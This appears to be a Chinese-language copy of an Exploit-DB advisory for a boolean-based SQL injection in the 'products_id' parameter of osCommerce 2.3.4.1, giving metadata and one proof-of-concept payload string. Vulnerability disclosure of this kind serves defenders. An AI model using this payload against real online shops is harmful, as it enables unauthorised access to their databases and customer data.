关键信息 漏洞名称: osCommerce 2.3.4.1 - 'products_id' SQL Injection EDB-ID: 46329 CVE: N/A 作者: Mehmet Emiroglu 类型: WEBAPPS 平台: PHP 日期: 2019-02-06 易受攻击的应用: osCommerce 漏洞详细信息 漏洞标题: osCommerce 2.3.4.1 - 'products_id' SQL Vulnerabilities 提交作者: Mehmet Emiroglu 厂商主页: https://www.oscommerce.com 软件链接: https://www.oscommerce.com/Products 版本: 2.3.4.1 类别: Webapps 测试环境: Wamp @Win CVE: N/A 软件描述: osCommerce Online Merchant 是一个完整的在线商店解决方案,包含一个商店前端和一个管理后台 POC (Boolean Based) 参数: products_id 攻击模式: oR 1811160=1811160 aNd 7193=7193 GET请求: 标签 SQL Injection (SQLi)